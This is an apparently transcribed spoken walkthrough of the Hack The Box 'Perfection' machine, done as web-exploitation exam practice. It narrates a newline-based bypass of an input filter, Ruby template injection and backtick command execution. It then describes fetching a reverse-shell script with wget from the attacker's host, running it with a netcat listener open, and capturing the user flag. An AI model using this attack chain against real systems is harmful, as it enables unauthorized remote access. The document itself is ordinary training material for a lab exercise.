Hey, what up, what up? Today I'm attempting perfection for the preparation for CWES. I already ran the Nmap, so let me run a more thorough one. Nmap. Let's see, throw all scripts on it. OA, Nmap. All scripts. Let's put the ports we want. It's 80 and 22. Let's go ahead and check the web server. This finished pretty quick. Check this out. So let me pull up my notes here, but because I want to keep this clean, let me copy all of it to my current directory. So let's copy desktop methodology. I think I have to put -r here. Perfect. Let me documents, hack the box, perfection. This. Okay. Cool. So let's start writing some notes, but before start our notes, let's keep something happening on the background. So let me use fav. Okay. I'm gonna start with fuzzing for hidden directories. User word list, checklists, discovery, work content, draft, small directories, remove comments and put some color, call it root, draft, small directories. Let that run, and now let's go ahead and take some notes. Let me split this. So our target, it's this. Say perfection. So I see engines here. So let me put web server engines. Seems this is a calculator. Okay, can't see anything other than that. Okay, we get Ruby. So let's say proc lang Ruby. Do we get the okay 3.0.2? Let's check for robots.txt. Sinatra. What is this? Hmm. It's a free open source web application framework written in Ruby. For quick creating web applications with minimal effort. It's a library. Okay. So we check this. What else? Would be nice if we could check the can't see any CMS until now. We have to check the responses. Okay, let me put that as green, so we know that's what we're typing. Get back here and try to get a feel of the application, why we made this. Secure student tools. We know that calculating grades based on completed weighting can be a bit of pain. And we get WebBrick right here. I don't know exactly what is WebBrick, but can add that to our notes. Let's see, what is WebBrick? Okay, it's a version of Ruby standard library emoji that implements an HTTP server toolkit. Okay, so this is what handles our HTTP requests. And it's another, so this is Ruby standard library module that implements HTTP. Okay. Can say check the page source as well. For any comments. Can't see anything here. Let's click around a bit. So we got some usernames here. Maybe If we need to brute force something, we can try those two. This must be the calculator it was talking about. Please enter a maximum of 5 category names, your grade in them out of 100 and their weight. Enter a name to the category field and 0 into the grade and weight fields if you are not using a row. Okay, let's say maths, grade 50, 50, and I don't know, history 50, that should make 100, right? And then put NA into the category field and 0 into the grade and weight fields. Like this. Does it do something? Let me open Burp real quick. Okay. Nothing here. Let us go and fast for files. Or we could do directories with extension. And be like let's say .html .sh no rb. Let's see. Check that. So we go here and submit this, I guess. Okay. So we get this back. So let me do this again. So get it in burp. What if I go back? Yes. Okay. Burp. Let me fix this a bit. Okay. Okay, first things first. Before I analyze the request, whenever I see this functionality, I think it's logical to think about XSS, right? Because whenever our input is reflected back to the page, we may think of XSS, or if an engine is being used on the background, maybe we can think of SSTI. I think this is the word, or SSI, or was it SSTI? SSTI attack thing. Don't know if I'm getting the server-side template injection. Just want to find definition. Was web application common use server-side templating technologies, Jinja, Twig, Free, blah blah blah, and then you abuse that templating functionality. So this is the two things that come in my mind: XSS and the other. However, if I manage to uh, get an XSS, I don't know how I will weaponize that to, go further into the application. So what I'm thinking right now is that um, SSTI. The other thing, of course, is that if this request is going back to a database, so maybe we could do an SQL, but let's check and see, I guess. Okay, so we got this. Let me get that to repeater. You can try injecting some let's put a quote. Hopefully this is visible to you guys. Let me find a way to get this bigger. User interface. Let me search for font. No. Font. Okay. Hopefully this is better. Is there a way to change the appearance as well? Dark. Yes. Cool. So I'm gonna start by appending a semicolon here, see what we get back. So let me make this bigger. Where is our results? Okay. So this is considered malicious. So let me pull up my notes and go to let me first go to injections and try a couple of things here. We could try quote. Quote is getting blocked. What about pipe? Pipe is getting blocked. I think end won't be considered as, yeah, this is getting blocked as well. Or yeah, blocked. About new line. Oh, 0A blocked. Okay. About backticks. This is a command injection. Blocked again. Substitution. Is it like this? No. It's dollar. Yeah, blocked again. Try tab. How is tab? 09. Malicious input. Can comment out. This won't work. Can try encoding and then try to let's see. Malicious input. If I put something then that malicious input, if I remove it, everything works. Yeah, there it is. Okay. Okay, let's go back to our notes. So we got some versions here. Let me check for any known exploits. Exploit. GitHub. Quest smuggling. Inject terminal meter escape sequence to look. Nothing here. An issue was discovered in WebRig Toolkit through 1.8.1 for Ruby that allows HTTP request smuggling by providing both content. I never did request smuggling, to be honest. In log files, attackers can exploit this. You should accept. What is this? What? I think this will work, but let's try it, why not? No, we're getting that error we got before, so I don't think this is the case. Yeah, we're getting that Sinatra. Is this leaking the internal port? Yeah. Okay. So what remains is could try for SQL injection. Command injection we did try, even though there are some bypasses we could try, but we could try SSTI. But even if we try SSTI, there are a lot of symbols that are getting blocked by the defensive mechanism that this web app has. However, let me search for Ruby SSTI. think payload all the things has a payload things STI. Let me find Ruby. There we go. Okay. Payload format. Yeah. This is, we're using Slim, right? Because where did we show Slim before? I think I remember seeing that. I think is when we attempt to go to robots. Robots.txt. No. Is it from Nmap? No. Whatever, we're gonna try all either way. So this is a payload format. Generic code injection payload work for many Ruby-based template engines such as ERB, Ruby, Ruby's HAML, and Slim. To use the payload, wrap them in the appropriate tag. Okay, we can try this too, I guess. So let me go here and do this. Let's URL encode that. Send. Malicious input blocked. Yeah, we have to find all the symbols that are getting blocked, so we know what to avoid in order to construct the payload. Maybe you can fuzz all symbols, and yeah, let's do fuzz here. Grab this. Let's say nano calc request.txt. Slide that in. Fav. I think it's R request. Forgot the syntax. Where are you? Request and request proto. Okay. So it's FOF request this HTTP user share word list set list. I think there is fuzzing. I think there is one. There we go. Special characters. And before, let's see what's inside there. Take a look. Yeah. We want to fast for all of this and see what's up. I don't like that. Let me put some color. This is different than the others, so I guess we should filter out this. Okay, so slash disallowed and percent and plus. We could say, grab this and say so we trade this. Yeah, let's go to the general notes and say something like characters allowed. We could try varies. Grab this. I think there is an encoded version of this as well. Yeah, URL encoded. Yes, we should try that as well. Let me go back here. I think 12 is slash, right? Yeah. This is slash. So there is not much. I don't think there's much we can do with this, you know. Okay, let me so the point is to put this in and then something in the middle. We can try this as well. Slim. Yeah, malicious content. If we try to I'm thinking right now is maybe we can put something in the end so it ignores the rest. Let me go with the first payload. And this will get blocked. But request. And a plus sign there. Like this. But request. These are different errors though, right? Invalid query parameters. Let me just URL encode this. What about now? Yeah, now. Okay, let's try adding in the command injection. I do have, yeah, at the start and end. So let me try this real quick. Let me try tab. Let me try that at the start. No. Let me try new line. Let me try, what's the other one? This. It doesn't like something, I don't know what it is though. Let me remove one by one. Let's remove this. Okay. Malicious input blocked. Malicious input blocked. This we know. It's okay. Is it this? Blocked. Is it this? No. That's the equal sign. Blocked. Is it? Yeah, this is considered malicious. Okay, we have to, if I do try to comment everything at the end, let's say, let's try this now. 0A, start and beginning, 0A. No. Let's try to put maths. Whoa, wait. What? What happened? It passed? Let me remove this. end this and go to if I do this, right, your total grade is 50, maths 25. If I put percent 0A here, yeah, nothing happens. And if I put percent 0A here, this gets, so it works because this got a new line. Okay. So just want to check something real quick. So this is, the characters alone are getting blocked, but when a word is there, any word, then it works, which is interesting to know, because I did try every. Okay, now maybe we could try, because we're on a new line, maybe we could try the injection now. Can I do ID? So can I do like this? No, it's not getting processed as a command. Maybe now we could do SSTI, right? Where is Ruby? This one. Can try that now. The reason I'm trying this again is because I see that now if we put, you know, different kind of symbols that before were considered malicious, now we can put them. So this new line bypassed the checks, I guess. So we could try this again. Let me URL encode that like this. And hooray, got 49. So we have execution there. Nice. So let me, so I guess whatever we put between the equals and the percent sign, can I do ID now? Internal server error. Maybe it needs some space here, like this. Right? No, we broke it. Maybe it needs some space here as well. No. 20, I think percent 20, it's space. Percent 20. No. Okay, let me try something else. Let's go back to our command injection. And try backticks or end ID. This is what I tried right now. Or this is how you read a file. We want execution though. Remote code execution. Yeah, they're including backticks in a parenthesis. So I guess if I do just backticks and then do ID like this, backticks ID. Yes. Okay. Whoops. So now we can go ahead and try to get a reverse shell. If I do something with space LA, does it still work? It does. Perfect. So let me get this so it's easier to navigate. Perfect. Okay. So let's check if wget is installed. It is. So let's spin up a web server real quick. Go back. And oh no. And create a directory. Let's create a shell. And 10, 15, 144. Let's do 9001. Let's do bash. Okay, and let's serve this now. Cool, and let's attempt to fetch it. HTTP 10.10 15 144 shell. Let's put that in temp shell. So wget HTTP 10.10 15.44 shell. Okay. Did it work? It didn't. Okay, let me add some pluses here. Something is wrong. Okay, it seems that it got it. Let's check temp to verify that we did upload the file. There we go. And it seems that we're gonna be Susan, the box. So let's do bash and open a netcat listener, sudo nc lp. We don't need sudo, but whatever. And run. It didn't work. Okay, let's try shmod. Oh, should work. Let me cut this. Oh, didn't upload correctly. Let's upload this again. We go back. It's because we had, yeah, let's make shell 2. Try it again. Okay, let me go ahead and use cat on shell 2. Now it's correct. Now let me run it. Bash, send, and it hangs. Yes, we are in. Perfect. And we are in sudo. Oh, sorry, password is required. Okay, I am going to let me see, do we get user.txt at least? Susan, yeah, I think we did. Yes, we did. Perfect. So I'm gonna stop the video here. I don't know if I'm gonna do a part 2 showing the privilege escalation part, but as I said before on the previous videos, I mean, this is enough for me to practice for the CWES, since it's a web exploitation, you know. But yeah, let me know in the comments if you want me guys to, you know, complete the boxes or keep it this way, because I think this is more relevant and I'm not wasting any more of your time. But I want to make a new note for today. So what I've noticed is that when I'm trying command injection or whatever like that, I just want to add another note that, let me say, note always try the above with a valid value. Next to a valid value, because, and let me just do this. Math is valid value. So could say let me add this there. Yeah, something like that. So I need to remember that not to check this alone. Sometimes maybe I need to add a valid value and then try to circumvent the defenses. Yeah, that's all from me. Thanks for watching, and I'll see you on the next one. Bye.